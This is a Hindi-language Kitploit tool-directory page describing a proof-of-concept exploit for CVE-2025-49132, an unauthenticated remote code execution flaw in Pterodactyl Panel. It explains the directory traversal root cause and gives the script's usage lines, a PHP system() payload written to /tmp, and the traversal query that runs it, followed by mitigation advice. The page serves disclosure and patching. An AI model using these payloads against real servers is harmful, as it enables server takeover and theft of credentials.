Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE- — CVE-2025-49132 (GHSA-24wv-6c99-f843) के लिए PoC शोषण – Pterodactyl Panel ≤ 1.11.10 में अप्रमाणित रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/dollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubdollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-

CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE-

CVE-2025-49132 (GHSA-24wv-6c99-f843) के लिए PoC शोषण – Pterodactyl Panel ≤ 1.11.10 में अप्रमाणित रिमोट कोड निष्पादन

रिपॉजिटरी देखेंवेबसाइट
317 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-49132

Pterodactyl Panel - अप्रमाणित रिमोट कोड निष्पादन (RCE)


🔎 सारांश

CVE‑2025‑49132 एक गंभीर रिमोट कोड निष्पादन भेद्यता है जो Pterodactyl Panel <= 1.11.10 को प्रभावित करती है।

एक अप्रमाणित हमलावर /locales/locale.json एंडपॉइंट में अनुचित इनपुट सत्यापन का शोषण करके मनमानी सिस्टम कमांड निष्पादित कर सकता है।

संस्करण में पैच किया गया: 1.11.11


📌 प्रभाव

सफल शोषण अनुमति देता है:

  • अप्रमाणित रिमोट कोड निष्पादन
  • संवेदनशील फ़ाइलें पढ़ना (जैसे, .env)
  • डेटाबेस क्रेडेंशियल निष्कर्षण
  • पूर्ण सर्वर समझौता

गंभीरता: गंभीर


🧠 मूल कारण

भेद्यता निम्नलिखित के अनुचित सत्यापन के कारण मौजूद है:

  • locale पैरामीटर
  • namespace पैरामीटर

एक हमलावर यह कर सकता है:

  1. डायरेक्टरी ट्रैवर्सल का दुरुपयोग (../../../../../)
  2. config-create का लाभ उठाएं
  3. /tmp में मनमाने PHP पेलोड लिखें
  4. निर्मित नेमस्पेस लोडिंग के माध्यम से निष्पादन ट्रिगर करें

कमजोरी वर्गीकरण: CWE-94 -- कोड जनरेशन का अनुचित नियंत्रण


🚀 प्रूफ ऑफ कॉन्सेप्ट (PoC)

उपयोग

root@kitploit:~
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]

उदाहरण

root@kitploit:~
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR

डिफ़ॉल्ट पथ:

root@kitploit:~
/usr/share/php/PEAR

/phpinfo.php पेज से उचित पथ प्राप्त करें alt text


🛠 शोषण प्रवाह

चरण 1 - पेलोड लिखें

हमलावर इसका उपयोग करके /tmp/payload.php में एक दुर्भावनापूर्ण PHP पेलोड इंजेक्ट करता है:

root@kitploit:~
/<?=system('id')?>+/tmp/payload.php

चरण 2 --- निष्पादन ट्रिगर करें

कॉल करके:

root@kitploit:~
?locale=../../../../../tmp&namespace=payload

सर्वर इंजेक्ट किए गए PHP को निष्पादित करता है।

alt text

🛡 शमन

  • Pterodactyl Panel >= 1.11.11 में अपग्रेड करें
  • locale और namespace इनपुट को सैनिटाइज़ करें
  • खतरनाक PHP फ़ंक्शन को अक्षम करें
  • अनावश्यक एंडपॉइंट एक्सपोज़र को प्रतिबंधित करें

📚 संदर्भ

  • GitHub सलाह: GHSA-24wv-6c99-f843
  • CVE-2025-49132
  • Pterodactyl Panel v1.11.11 पैच कमिट

टूल डाउनलोड करें